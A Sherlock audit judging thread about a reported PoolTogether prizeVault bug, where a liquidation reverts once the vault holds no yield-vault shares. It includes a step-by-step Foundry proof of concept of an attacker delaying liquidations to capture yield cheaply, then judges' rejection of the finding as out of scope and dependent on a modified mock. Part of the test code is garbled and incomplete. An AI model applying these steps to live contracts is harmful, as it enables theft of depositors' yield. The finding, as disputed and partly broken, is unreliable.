sherlock-audit / 2024-05-pooltogether-judging

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0xSpearmint1 - An attacker can force a prizeVault into a state to delay liquidations for a greater profit #116

Closed sherlock-admin2 closed 2 months ago

sherlock-admin2 commented 3 months ago



An attacker can force a prizeVault into a state to delay liquidations for a greater profit


An attacker can force a prizeVault into a state to delay liquidations for a greater profit

Vulnerability Detail

transferTokensOut is function that will always be called in the liquidation flow

function transferTokensOut(
        address /* sender */,
        address _receiver,
        address _tokenOut,
        uint256 _amountOut
    ) external virtual onlyLiquidationPair returns (bytes memory) {
        if (_amountOut == 0) revert LiquidationAmountOutZero();

        uint256 _totalDebtBefore = totalDebt();
        uint256 _availableYield = _availableYieldBalance(totalPreciseAssets(), _totalDebtBefore);

The vulnerability is the use of totalPreciseAssets in the calculation of _availableYield

If the amount of yieldVault shares held by the prizeVault = 0, then totalPreciseAssets will revert since yieldVault.previewRedeem(yieldVault.balanceOf(address(this))) will revert.

An attacker can take advantage of this by liquidating a large amount of yield and then withdrawing their deposit to enter the required state where amount of yieldVault shares held by the prizeVault = 0.

At this point liquidations will revert due to the reasons previously mentioned

An attacker can then wait for some time and then deposit to increase yieldVault shares and then liquidate at a very cheap price since it is done via a Dutch auction


The attacker has effectively stolen the yield from other users.

The attacker has reduced the chances of winning for all other users of that vault.

Users of the vault will have a lower likelihood of winning a prize

Proof of concept

Replace the existing BaseIntegration.t.sol in /2024-05-pooltogether/pt-v5-vault/test/integration/BaseIntegration.t.sol with the following

```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import { Test } from "forge-std/Test.sol"; import { console2 } from "forge-std/console2.sol"; import { IERC20, IERC4626 } from "openzeppelin/token/ERC20/extensions/ERC4626.sol"; import { PrizePool } from "pt-v5-prize-pool/PrizePool.sol"; import { TwabController } from "pt-v5-twab-controller/TwabController.sol"; import { ERC20PermitMock } from "../contracts/mock/ERC20PermitMock.sol"; import { PrizePoolMock } from "../contracts/mock/PrizePoolMock.sol"; import { Permit } from "../contracts/utility/Permit.sol"; import { PrizeVaultWrapper, PrizeVault } from "../contracts/wrapper/PrizeVaultWrapper.sol"; import { YieldVault } from "../contracts/mock/YieldVault.sol"; abstract contract BaseIntegration is Test, Permit { /* ============ events ============ */ event Deposit(address indexed sender, address indexed owner, uint256 assets, uint256 shares); event Transfer(address indexed from, address indexed to, uint256 value); event ClaimerSet(address indexed claimer); event LiquidationPairSet(address indexed tokenOut, address indexed liquidationPair); event YieldFeeRecipientSet(address indexed yieldFeeRecipient); event YieldFeePercentageSet(uint256 yieldFeePercentage); event MockContribute(address prizeVault, uint256 amount); event ClaimYieldFeeShares(address indexed recipient, uint256 shares); event TransferYieldOut(address indexed liquidationPair, address indexed tokenOut, address indexed recipient, uint256 amountOut, uint256 yieldFee); event Sponsor(address indexed caller, uint256 assets, uint256 shares); /* ============ variables ============ */ address public vitalik = 0xd8dA6BF26964aF9D7eEd9e03E53415D37aA96045; address public attacker = 0xEf57e88a27f8958D72fd9F983D28349374e6C110; address internal owner; uint256 internal ownerPrivateKey; address internal alice; uint256 internal alicePrivateKey; address internal bob; uint256 internal bobPrivateKey; PrizeVaultWrapper public prizeVault; string public vaultName = "PoolTogether Test Vault"; string public vaultSymbol = "pTest"; uint256 public yieldBuffer = 1e5; IERC4626 public yieldVault; ERC20PermitMock public underlyingAsset; uint8 public assetDecimals; uint256 public approxAssetUsdExchangeRate; ERC20PermitMock public prizeToken; address public claimer; PrizePoolMock public prizePool; uint32 public drawPeriodSeconds = 1 days; TwabController public twabController; /// @dev A low gas estimate of what it would cost in gas to manipulate the state into losing 1 wei of assets /// in a rounding error. (This should be a unachievable low estimate such that an attacker would never be able /// to cause repeated rounding errors for less). uint256 lowGasEstimateForStateChange = 100_000; /// @dev A low gas price estimate for the chain. uint256 lowGasPriceEstimate = 7 gwei; /// @dev Defined in 1e18 precision. (2e18 would be 2 ETH per USD) uint256 approxEthUsdExchangeRate = uint256(1e18) / uint256(3000); // approx 1 ETH for $3000 /// @dev Override to true if vault is not expected to have yield bool ignoreYield = false; /// @dev Override to true if vault cannot feasibly lose assets bool ignoreLoss = false; /// @dev Some yield vaults have predictable precision loss (such as Sonne which reduces precision of assets with their exchange rate). /// This optional variable can be set if this precision loss is acknowledged and appropriate countermeasures will be taken (ex. deploying /// a PrizeVault with a higher yield buffer to match the reduced precision). uint8 assetPrecisionLoss = 0; /* ============ setup ============ */ function setUpUnderlyingAsset() public virtual returns (IERC20 asset, uint8 decimals, uint256 approxAssetUsdExchangeRate); function setUpYieldVault() public virtual returns (IERC4626) { return new YieldVault( address(underlyingAsset), "Test Yield Vault", "yvTest" ); } function setUpFork() public virtual; function beforeSetup() public virtual; function afterSetup() public virtual; function setUp() public virtual { beforeSetup(); (owner, ownerPrivateKey) = makeAddrAndKey("Owner"); (alice, alicePrivateKey) = makeAddrAndKey("Alice"); (bob, bobPrivateKey) = makeAddrAndKey("Bob"); underlyingAsset = new ERC20PermitMock("SHIBE"); yieldVault = setUpYieldVault(); prizeToken = new ERC20PermitMock("POOL"); twabController = new TwabController(1 hours, uint32(block.timestamp)); prizePool = new PrizePoolMock(prizeToken, twabController); claimer = address(0xe291d9169F0316272482dD82bF297BB0a11D267f); // adjust yield buffer based-on mitigated precision loss yieldBuffer = 1e5 * (10 ** assetPrecisionLoss); prizeVault = new PrizeVaultWrapper( vaultName, vaultSymbol, yieldVault, PrizePool(address(prizePool)), claimer, bob, 0, yieldBuffer, // yield buffer address(this) ); prizeVault.setLiquidationPair(address(this)); // Fill yield buffer if non-zero: if (yieldBuffer > 0) { dealAssets(address(prizeVault), yieldBuffer); } afterSetup(); } /* ============ prank helpers ============ */ address private currentPrankee; /// @notice should be used instead of vm.startPrank so we can keep track of pranks within other pranks function startPrank(address prankee) public { currentPrankee = prankee; vm.startPrank(prankee); } /// @notice should be used instead of vm.stopPrank so we can keep track of pranks within other pranks function stopPrank() public { currentPrankee = address(0); vm.stopPrank(); } /// @notice pranks the address and sets the prank back to the msg sender at the end modifier prankception(address prankee) { address prankBefore = currentPrankee; vm.stopPrank(); vm.startPrank(prankee); _; vm.stopPrank(); if (prankBefore != address(0)) { vm.startPrank(prankBefore); } } /* ============ helpers to override ============ */ /// @dev The max amount of assets than can be dealt. function maxDeal() public virtual returns (uint256); /// @dev May revert if the amount requested exceeds the amount available to deal. function dealAssets(address to, uint256 amount) public virtual; /// @dev Some yield sources accrue by time, so it's difficult to accrue an exact amount. Call the /// function multiple times if the test requires the accrual of more yield than the default amount. function _accrueYield() internal virtual; /// @dev Simulates loss on the yield vault such that the value of it's shares drops function _simulateLoss() internal virtual; /// @dev Each integration test must override the `_accrueYield` internal function for this to work. function accrueYield() public returns (uint256) { uint256 assetsBefore = prizeVault.totalPreciseAssets(); _accrueYield(); uint256 assetsAfter = prizeVault.totalPreciseAssets(); if (yieldVault.balanceOf(address(prizeVault)) > 0) { // if the prize vault has any yield vault shares, check to ensure yield has accrued require(assetsAfter > assetsBefore, "yield did not accrue"); } else { if (underlyingAsset.balanceOf(address(prizeVault)) > 0) { // the underlying asset might be rebasing in some setups, so it's possible time passing has caused an increase in latent balance require(assetsAfter >= assetsBefore, "assets decreased while holding latent balance"); } else { // otherwise, we should expect no change on the prize vault require(assetsAfter == assetsBefore, "assets changed with zero yield shares"); } } return assetsAfter - assetsBefore; } function checkIgnoreYield() internal returns (bool) { if (ignoreYield) { console2.log("skipping test since yield is ignored..."); return true; } return false; } /// @dev Each integration test must override the `_simulateLoss` internal function for this to work. /// @return The loss the prize vault has incurred as a result of yield vault loss (if any) function simulateLoss() public returns (uint256) { uint256 assetsBefore = prizeVault.totalPreciseAssets(); _simulateLoss(); uint256 assetsAfter = prizeVault.totalPreciseAssets(); if (yieldVault.balanceOf(address(prizeVault)) > 0) { // if the prize vault has any yield vault shares, check to ensure some loss has occurred require(assetsAfter < assetsBefore, "loss not simulated"); } else { if (underlyingAsset.balanceOf(address(prizeVault)) > 0) { // the underlying asset might be rebasing in some setups, so it's possible time passing has caused an increase in latent balance require(assetsAfter >= assetsBefore, "assets decreased while holding latent balance"); return 0; } else { // otherwise, we should expect no change on the prize vault require(assetsAfter == assetsBefore, "assets changed with zero yield shares"); } } return assetsBefore - assetsAfter; } function checkIgnoreLoss() internal returns (bool) { if (ignoreLoss) { console2.log("skipping test since loss is ignored..."); return true; } return false; } /* ============ Integration Test Scenarios ============ */ ////////////////////////////////////////////////////////// /// Basic Asset Tests ////////////////////////////////////////////////////////// /// @dev Tests if the asset meets a minimum precision per dollar (PPD). If the asset /// is below this PPD, then it is possible that the yield buffer will not be able to sustain /// the rounding errors that will accrue on deposits and withdrawals. /// /// Also passes if the yield buffer is zero (no buffer is needed if rounding errors are impossible). function testAssetPrecisionMeetsMinimum() public { if (yieldBuffer > 0) { uint256 minimumPPD = 1e6; // USDC is the benchmark (6 decimals represent $1 of value) uint256 assetPPD = (1e18 * (10 ** (assetDecimals - assetPrecisionLoss))) / approxAssetUsdExchangeRate; assertGe(assetPPD, minimumPPD, "asset PPD > minimum PPD"); } } /// @notice Test if the attacker can cause rounding error loss on the prize vault by spending /// less in gas than the rounding error loss will cost the vault. /// /// @dev This is an important measure to test since it's possible that some yield vaults can essentially /// rounding errors to other holders of yield vault shares. If an attacker can cheaply cause repeated /// rounding errors on the prize vault, they can potentially profit by being a majority shareholder on /// the underlying yield vault. function testAssetRoundingErrorManipulationCost() public { uint256 costToManipulateInEth = lowGasPriceEstimate * lowGasEstimateForStateChange; uint256 costToManipulateInUsd = (costToManipulateInEth * 1e18) / approxEthUsdExchangeRate; uint256 costOfRoundingErrorInUsd = ((10 ** assetPrecisionLoss) * 1e18) / approxAssetUsdExchangeRate; // 10x threshold is set so an attacker would have to spend at least 10x the loss they can cause on the prize vault. uint256 multiplierThreshold = 10; assertLt(costOfRoundingErrorInUsd * multiplierThreshold, costToManipulateInUsd, "attacker can cheaply cause rounding errors"); } ////////////////////////////////////////////////////////// /// Deposit Tests ////////////////////////////////////////////////////////// /// @notice test deposit function testDeposit() public { uint256 amount = 10 ** assetDecimals; uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(alice, amount); uint256 totalAssetsBefore = prizeVault.totalPreciseAssets(); uint256 totalSupplyBefore = prizeVault.totalSupply(); startPrank(alice); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, alice); stopPrank(); uint256 totalAssetsAfter = prizeVault.totalPreciseAssets(); uint256 totalSupplyAfter = prizeVault.totalSupply(); assertEq(prizeVault.balanceOf(alice), amount, "shares minted"); assertApproxEqAbs( totalAssetsBefore + amount, totalAssetsAfter, 10 ** assetPrecisionLoss, "assets accounted for with possible rounding error" ); assertEq(totalSupplyBefore + amount, totalSupplyAfter, "supply increased by amount"); } /// @notice test multi-user deposit function testMultiDeposit() public { address[] memory depositors = new address[](3); depositors[0] = alice; depositors[1] = bob; depositors[2] = address(this); for (uint256 i = 0; i < depositors.length; i++) { uint256 amount = (10 ** assetDecimals) * (i + 1); uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(depositors[i], amount); uint256 totalAssetsBefore = prizeVault.totalPreciseAssets(); uint256 totalSupplyBefore = prizeVault.totalSupply(); startPrank(depositors[i]); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, depositors[i]); stopPrank(); uint256 totalAssetsAfter = prizeVault.totalPreciseAssets(); uint256 totalSupplyAfter = prizeVault.totalSupply(); assertEq(prizeVault.balanceOf(depositors[i]), amount, "shares minted"); assertApproxEqAbs( totalAssetsBefore + amount, totalAssetsAfter, 10 ** assetPrecisionLoss, "assets accounted for with possible rounding error" ); assertEq(totalSupplyBefore + amount, totalSupplyAfter, "supply increased by amount"); } } /// @notice test multi-user deposit w/yield accrual in between function testMultiDepositWithYieldAccrual() public { if (checkIgnoreYield()) return; address[] memory depositors = new address[](2); depositors[0] = alice; depositors[1] = bob; for (uint256 i = 0; i < depositors.length; i++) { uint256 amount = (10 ** assetDecimals) * (i + 1); uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(depositors[i], amount); uint256 totalAssetsBefore = prizeVault.totalPreciseAssets(); uint256 totalSupplyBefore = prizeVault.totalSupply(); startPrank(depositors[i]); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, depositors[i]); stopPrank(); uint256 totalAssetsAfter = prizeVault.totalPreciseAssets(); uint256 totalSupplyAfter = prizeVault.totalSupply(); assertEq(prizeVault.balanceOf(depositors[i]), amount, "shares minted"); assertApproxEqAbs( totalAssetsBefore + amount, totalAssetsAfter, 10 ** assetPrecisionLoss, "assets accounted for with possible rounding error" ); assertEq(totalSupplyBefore + amount, totalSupplyAfter, "supply increased by amount"); if (i == 0) { // accrue yield accrueYield(); } } } ////////////////////////////////////////////////////////// /// Withdrawal Tests ////////////////////////////////////////////////////////// /// @notice test withdraw /// @dev also tests for any active deposit / withdraw fees function testWithdraw() public { uint256 amount = 10 ** assetDecimals; uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(alice, amount); uint256 totalAssetsBefore = prizeVault.totalPreciseAssets(); uint256 totalSupplyBefore = prizeVault.totalSupply(); startPrank(alice); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, alice); prizeVault.withdraw(amount, alice, alice); stopPrank(); uint256 totalAssetsAfter = prizeVault.totalPreciseAssets(); uint256 totalSupplyAfter = prizeVault.totalSupply(); assertEq(prizeVault.balanceOf(alice), 0, "burns all user shares on full withdraw"); assertEq(underlyingAsset.balanceOf(alice), amount, "withdraws full amount of assets"); assertApproxEqAbs( totalAssetsBefore, totalAssetsAfter, 2 * 10 ** assetPrecisionLoss, "no assets missing except for possible rounding error" ); // 1 possible rounding error for deposit, 1 for withdraw assertEq(totalSupplyBefore, totalSupplyAfter, "supply same as before"); } /// @notice test withdraw with yield accrual function testWithdrawWithYieldAccrual() public { if (checkIgnoreYield()) return; uint256 amount = 10 ** assetDecimals; uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(alice, amount); uint256 totalAssetsBefore = prizeVault.totalPreciseAssets(); uint256 totalSupplyBefore = prizeVault.totalSupply(); startPrank(alice); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, alice); uint256 yield = accrueYield(); // accrue yield in between prizeVault.withdraw(amount, alice, alice); stopPrank(); uint256 totalAssetsAfter = prizeVault.totalPreciseAssets(); uint256 totalSupplyAfter = prizeVault.totalSupply(); assertEq(prizeVault.balanceOf(alice), 0, "burns all user shares on full withdraw"); assertEq(underlyingAsset.balanceOf(alice), amount, "withdraws full amount of assets"); assertApproxEqAbs( totalAssetsBefore + yield, totalAssetsAfter, 2 * 10 ** assetPrecisionLoss, "no assets missing except for possible rounding error" ); // 1 possible rounding error for deposit, 1 for withdraw assertEq(totalSupplyBefore, totalSupplyAfter, "supply same as before"); } /// @notice test all users withdraw function testWithdrawAllUsers() public { address[] memory depositors = new address[](3); depositors[0] = alice; depositors[1] = bob; depositors[2] = address(this); uint256[] memory amounts = new uint256[](3); // deposit for (uint256 i = 0; i < depositors.length; i++) { uint256 amount = (10 ** assetDecimals) * (i + 1); uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; amounts[i] = amount; dealAssets(depositors[i], amount); startPrank(depositors[i]); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, depositors[i]); stopPrank(); } // withdraw for (uint256 i = 0; i < depositors.length; i++) { uint256 totalAssetsBefore = prizeVault.totalPreciseAssets(); uint256 totalSupplyBefore = prizeVault.totalSupply(); startPrank(depositors[i]); prizeVault.withdraw(amounts[i], depositors[i], depositors[i]); stopPrank(); uint256 totalAssetsAfter = prizeVault.totalPreciseAssets(); uint256 totalSupplyAfter = prizeVault.totalSupply(); assertEq(prizeVault.balanceOf(depositors[i]), 0, "burned all user's shares on withdraw"); assertEq(underlyingAsset.balanceOf(depositors[i]), amounts[i], "withdrew full asset amount for user"); assertApproxEqAbs( totalAssetsBefore, totalAssetsAfter + amounts[i], 10 ** assetPrecisionLoss, "assets accounted for with no more than 1 wei rounding error" ); assertEq(totalSupplyBefore - amounts[i], totalSupplyAfter, "total supply decreased by amount"); } } /// @notice test all users withdraw during lossy state function testWithdrawAllUsersWhileLossy() public { if (checkIgnoreLoss()) return; address[] memory depositors = new address[](3); depositors[0] = alice; depositors[1] = bob; depositors[2] = address(this); // deposit for (uint256 i = 0; i < depositors.length; i++) { uint256 amount = (10 ** assetDecimals) * (i + 1); uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(depositors[i], amount); startPrank(depositors[i]); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, depositors[i]); stopPrank(); } // cause loss on the yield vault simulateLoss(); // ensure prize vault is in lossy state assertLt(prizeVault.totalPreciseAssets(), prizeVault.totalDebt()); // verify all users can withdraw a proportional amount of assets for (uint256 i = 0; i < depositors.length; i++) { uint256 shares = prizeVault.balanceOf(depositors[i]); uint256 totalAssetsBefore = prizeVault.totalPreciseAssets(); uint256 totalSupplyBefore = prizeVault.totalSupply(); uint256 totalDebtBefore = prizeVault.totalDebt(); uint256 expectedAssets = (shares * totalAssetsBefore) / totalDebtBefore; startPrank(depositors[i]); uint256 assets = prizeVault.redeem(shares, depositors[i], depositors[i]); stopPrank(); uint256 totalAssetsAfter = prizeVault.totalPreciseAssets(); uint256 totalSupplyAfter = prizeVault.totalSupply(); assertEq(assets, expectedAssets, "assets received proportional to shares / totalDebt"); assertEq(prizeVault.balanceOf(depositors[i]), 0, "burned all user's shares on withdraw"); assertEq(underlyingAsset.balanceOf(depositors[i]), assets, "withdrew assets for user"); assertApproxEqAbs( totalAssetsBefore, totalAssetsAfter + assets, 10 ** assetPrecisionLoss, "assets accounted for with no more than 1 wei rounding error" ); assertEq(totalSupplyBefore - shares, totalSupplyAfter, "total supply decreased by shares"); } } /// @notice test liquidation of assets function testAssetLiquidation() public { if (checkIgnoreYield()) return; // Deposit uint256 amount = 1000 * (10 ** assetDecimals); uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(alice, amount); startPrank(alice); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, alice); stopPrank(); // Yield Accrual uint256 approxYield = accrueYield(); uint256 availableYield = prizeVault.availableYieldBalance(); assertApproxEqAbs( approxYield, availableYield, 10 ** assetPrecisionLoss, "approx yield equals available yield balance" ); uint256 availableAssets = prizeVault.liquidatableBalanceOf(address(underlyingAsset)); assertGt(availableAssets, 0, "assets are available for liquidation"); // Liquidate prizeVault.transferTokensOut(address(0), bob, address(underlyingAsset), availableAssets); assertEq(underlyingAsset.balanceOf(bob), availableAssets, "liquidator is transferred expected assets"); assertApproxEqAbs(prizeVault.availableYieldBalance(), availableYield - availableAssets, 10 ** assetPrecisionLoss, "available yield decreased (w / 1 wei rounding error)"); assertApproxEqAbs(prizeVault.liquidatableBalanceOf(address(underlyingAsset)), 0, 10 ** assetPrecisionLoss, "no more assets can be liquidated (w/ 1 wei rounding error)"); } /// @notice test liquidatable balance of when lossy function testNoLiquidationWhenLossy() public { if (checkIgnoreYield() || checkIgnoreLoss()) return; // Deposit uint256 amount = 1000 * (10 ** assetDecimals); uint256 maxAmount = maxDeal() / 2; if (amount > maxAmount) amount = maxAmount; dealAssets(alice, amount); startPrank(alice); underlyingAsset.approve(address(prizeVault), amount); prizeVault.deposit(amount, alice); stopPrank(); // Yield Accrual uint256 approxYield = accrueYield(); uint256 availableYield = prizeVault.availableYieldBalance(); assertApproxEqAbs( approxYield, availableYield, 10 ** assetPrecisionLoss, "approx yield equals available yield balance" ); uint256 availableAssets = prizeVault.liquidatableBalanceOf(address(underlyingAsset)); assertGt(availableAssets, 0, "assets are available for liquidation"); uint256 availableShares = prizeVault.liquidatableBalanceOf(address(prizeVault)); assertGt(availableShares, 0, "shares are available for liquidation"); // Loss Occurs simulateLoss(); // No liquidations can occur if assets < debt availableYield = prizeVault.availableYieldBalance(); assertEq(availableYield, 0, "no available yield after loss"); availableAssets = prizeVault.liquidatableBalanceOf(address(underlyingAsset)); assertEq(availableAssets, 0, "no available asset liquidation after loss"); availableShares = prizeVault.liquidatableBalanceOf(address(prizeVault)); assertEq(availableShares, 0, "no available share liquidation after loss"); } } ```

Update the yieldVault MOCK so it is more realistic with the sanity check

Find it in /2024-05-pooltogether/pt-v5-vault/test/contracts/mock/YieldVault.sol

```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import { ERC4626Mock } from "openzeppelin/mocks/ERC4626Mock.sol"; import { Math } from "openzeppelin/utils/math/Math.sol"; contract YieldVault is ERC4626Mock { using Math for uint256; constructor(address _asset, string memory _name, string memory _symbol) ERC4626Mock(_asset) {} /** * We override the virtual shares and assets implementation since this approach captures * a very small part of the yield being accrued, which offsets by 1 wei * the withdrawable amount from the YieldVault and skews our unit tests equality comparisons. * Read this comment in the OpenZeppelin documentation to understand why: * */ // function _convertToShares( // uint256 assets, // Math.Rounding rounding // ) internal view virtual override returns (uint256) { // uint256 supply = totalSupply(); // return (assets == 0 || supply == 0) ? assets : assets.mulDiv(supply, totalAssets(), rounding); // } // function _convertToAssets( // uint256 shares, // Math.Rounding rounding // ) internal view virtual override returns (uint256) { // uint256 supply = totalSupply(); // return (shares == 0 || supply == 0) ? shares : shares.mulDiv(totalAssets(), supply, rounding); // } function previewRedeem(uint256 shares) public view virtual override returns (uint256) { require(shares > 0, "Shares must be greater than 0"); return super.previewRedeem(shares); } } ```

Now add the following ComplexLiquidationAttack.sol to /2024-05-pooltogether/pt-v5-vault/test/integration/ComplexLiquidationAttack.sol

The following foundry test test__ComplexLiquidationAttack() illustrates the attack scenario.

Run it with the following command line input

forge test --mt test__ComplexLiquidationAttack -vv
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

import { Test } from "forge-std/Test.sol";
import { console } from "forge-std/console.sol";
import { BaseIntegration } from "./BaseIntegration.t.sol";

import { IERC20, IERC4626 } from "openzeppelin/token/ERC20/extensions/ERC4626.sol";

import { PrizePool } from "pt-v5-prize-pool/PrizePool.sol";
import { TwabController } from "pt-v5-twab-controller/TwabController.sol";

import { ERC20PermitMock } from "../contracts/mock/ERC20PermitMock.sol";
import { PrizePoolMock } from "../contracts/mock/PrizePoolMock.sol";
import { Permit } from "../contracts/utility/Permit.sol";

import { PrizeVaultWrapper, PrizeVault } from "../contracts/wrapper/PrizeVaultWrapper.sol";

import { YieldVault } from "../contracts/mock/YieldVault.sol";

contract ComplexLiquidationAttack is Test, BaseIntegration {
    function setUp() override public {

        // Setup users, type(uint128).max);
        underlyingAsset.approve(address(prizeVault), type(uint128).max);, type(uint128).max);
        underlyingAsset.approve(address(prizeVault), type(uint128).max);, type(uint128).max);
        underlyingAsset.approve(address(prizeVault), type(uint128).max);, type(uint128).max);
        underlyingAsset.approve(address(prizeVault), type(uint128).max);

    function setUpUnderlyingAsset() public override returns (IERC20 asset, uint8 decimals, uint256 approxAssetUsdExchangeRate) {}

    function setUpFork() public override {}

    function beforeSetup() public override {}

    function afterSetup() public override {}

    /* ============ helpers to override ============ */

    /// @dev The max amount of assets than can be dealt.
    function maxDeal() public override returns (uint256) {}

    /// @dev May revert if the amount requested exceeds the amount available to deal.
    function dealAssets(address to, uint256 amount) public override {}

    /// @dev Some yield sources accrue by time, so it's difficult to accrue an exact amount. Call the 
    /// function multiple times if the test requires the accrual of more yield than the default amount.
    function _accrueYield() internal override {
        IERC20(underlyingAsset).transfer(address(yieldVault), 10000000);

    /// @dev Simulates loss on the yield vault such that the value of it's shares drops
    function _simulateLoss() internal override {}

    function test__ComplexLiquidationAttack() public {

        // Multiple users deposit into the vault
        prizeVault.deposit(10e6, alice);

        prizeVault.deposit(10e6, attacker);

        prizeVault.deposit(10e6, vitalik);

        console.log("Total YieldVault shares owned by PrizeVault after deposits =", yieldVault.balanceOf(address(prizeVault)));

        // The attacker directly transfers yield into the yieldVault
        underlyingAsset.transfer(address(yieldVault), 700000000e6);

        // The attacker immediately liquidates the yield for a minimal amount of prizeTokens (since the amount of yield does not influence the price)
        prizeVault.transferTokensOut(address(0), bob, address(underlyingAsset), prizeVault.liquidatableBalanceOf(address(underlyingAsset)));

        console.log("Total YieldVault shares owned by PrizeVault after liquidation =", yieldVault.balanceOf(address(prizeVault)));

        // The attacker calls withdraw(), this will redeem the last yieldVault share      
        prizeVault.withdraw(prizeVault.balanceOf(attacker), attacker, attacker);

        // This shows there are no more yieldVault shares left
        console.log("Total YieldVault shares owned by PrizeVault after attacker withdraws =", yieldVault.balanceOf(address(prizeVault)));

        // Yield Accrual
        underlyingAsset.transfer(address(yieldVault), 10000);

        // When a honest user tries to liquidate it will revert
        vm.expectRevert("Shares must be greater than 0");
        prizeVault.transferTokensOut(address(0), bob, address(underlyingAsset), 10000);

        //Attacker waits for a few days to make the liquidation cheap
        skip(3 days);

        // Attacker deposits to mint yieldVault shares
        prizeVault.deposit(1000e6, attacker);
        console.log("Total YieldVault shares owned by PrizeVault after attacker deposits again =", yieldVault.balanceOf(address(prizeVault)));

        // Yield Accrual 
        underlyingAsset.transfer(address(yieldVault), 100000);

        // Attacker backruns the deposit with a liquidation for a great profit
        prizeVault.transferTokensOut(address(0), bob, address(underlyingAsset), 100);



Code Snippet

Tool used

Manual Review


Possibly using _tryGetTotalPreciseAssets in the calcualtion of _availableYield, I did not have the time to verify if this works / is foolproof

nevillehuang commented 2 months ago

Invalid, yieldvault logic is OOS of this contest. The watson also attempted to introduce new logic into the mock yield vault contracts

If the amount of yieldVault shares held by the prizeVault = 0, then totalPreciseAssets will revert since yieldVault.previewRedeem(yieldVault.balanceOf(address(this))) will revert.

0xspearmint1 commented 2 months ago

This is a valid high severity issue

Root cause: transferTokensOut() reverts when yieldVault shares owned by the prizeVault = 0 DUE TO use of totalPreciseAssets in the calcualtion of _availableYield, totalPreciseAssets will revert.

Impact: = The attacker has effectively stolen the yield from other users. The attacker has reduced the chances of winning for all other users of that vault.

The attack path is clearly documented in the vulnerability detail and POC

The judge stated

yieldvault logic is OOS of this contest

Obviously yieldvault logic is OOS, BUT this issue has a root cause within the prizeVault and impacts the prizeVault depositors therefore has to be in scope

The purpose of a mock yieldVault contract is to act exactly how a live yieldVault would work when testing the protocol. I modified the mock so that is is more in line with a realistic yieldVault that will have sanity 0 checks.

Read the comments in the POC for the clear attack path. I have included it below for easy reference.

```solidity function test__ComplexLiquidationAttack() public { // Multiple users deposit into the vault vm.startPrank(alice); prizeVault.deposit(10e6, alice); vm.startPrank(attacker); prizeVault.deposit(10e6, attacker); vm.startPrank(vitalik); prizeVault.deposit(10e6, vitalik); console.log("Total YieldVault shares owned by PrizeVault after deposits =", yieldVault.balanceOf(address(prizeVault))); // The attacker directly transfers yield into the yieldVault vm.startPrank(attacker); underlyingAsset.transfer(address(yieldVault), 700000000e6); // The attacker immediately liquidates the yield for a minimal amount of prizeTokens (since the amount of yield does not influence the price) vm.stopPrank(); prizeVault.transferTokensOut(address(0), bob, address(underlyingAsset), prizeVault.liquidatableBalanceOf(address(underlyingAsset))); console.log("Total YieldVault shares owned by PrizeVault after liquidation =", yieldVault.balanceOf(address(prizeVault))); // The attacker calls withdraw(), this will redeem the last yieldVault share vm.startPrank(attacker); prizeVault.withdraw(prizeVault.balanceOf(attacker), attacker, attacker); // This shows there are no more yieldVault shares left console.log("Total YieldVault shares owned by PrizeVault after attacker withdraws =", yieldVault.balanceOf(address(prizeVault))); // Yield Accrual vm.startPrank(alice); underlyingAsset.transfer(address(yieldVault), 10000); // When a honest user tries to liquidate it will revert vm.stopPrank(); vm.expectRevert("Shares must be greater than 0"); prizeVault.transferTokensOut(address(0), bob, address(underlyingAsset), 10000); //Attacker waits for a few days to make the liquidation cheap skip(3 days); // Attacker deposits to mint yieldVault shares vm.startPrank(attacker); prizeVault.deposit(1000e6, attacker); console.log("Total YieldVault shares owned by PrizeVault after attacker deposits again =", yieldVault.balanceOf(address(prizeVault))); // Yield Accrual vm.startPrank(alice); underlyingAsset.transfer(address(yieldVault), 100000); // Attacker backruns the deposit with a liquidation for a great profit vm.stopPrank(); prizeVault.transferTokensOut(address(0), bob, address(underlyingAsset), 100); } ```
0xjuaan commented 2 months ago


On behalf of @0xspearmint1

sherlock-admin3 commented 2 months ago


On behalf of @0xspearmint1

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

WangSecurity commented 2 months ago

@0xspearmint1 can you please clarify how "yieldVault shares held by the prizeVault" can be 0? Wouldn't it also mean that the prize vault has 0 deposits? And how is it calculated, based on yieldVault logic?

0x73696d616f commented 2 months ago

This attack is invalid for the same reason here. Also, anyone may deposit and liquidate anyway.

0xspearmint1 commented 2 months ago

@WangSecurity During a liquidation the following line is hit in transferTokensOut.

We can see that inside the _withdraw function it will redeem yieldVault shares.

If you liquidate an amount large enough, it is possible to redeem all the shares ( proof in POC in issue ).

Since the price of a liquidation is NOT based on the liquidatable balance, an attacker can artificially inflate this by donating to the YV, so that the transferTokensOut will redeem all the YV shares, for the same price.

WangSecurity commented 2 months ago

I believe this issue is dependant on the YV calculations and how they deal with redeeming the shares there. Also, it can be fixed in the very same YV as well. Hence, I cannot accept it as a valid issue cause it depends on the logic of YV.

Planning to reject the escalation and leave the issue as it is.

0xspearmint1 commented 2 months ago

@WangSecurity How did you come to that conclusion? The issue DOES NOT depend on YV logic. The is no fix in the YV to solve this.

WangSecurity commented 2 months ago

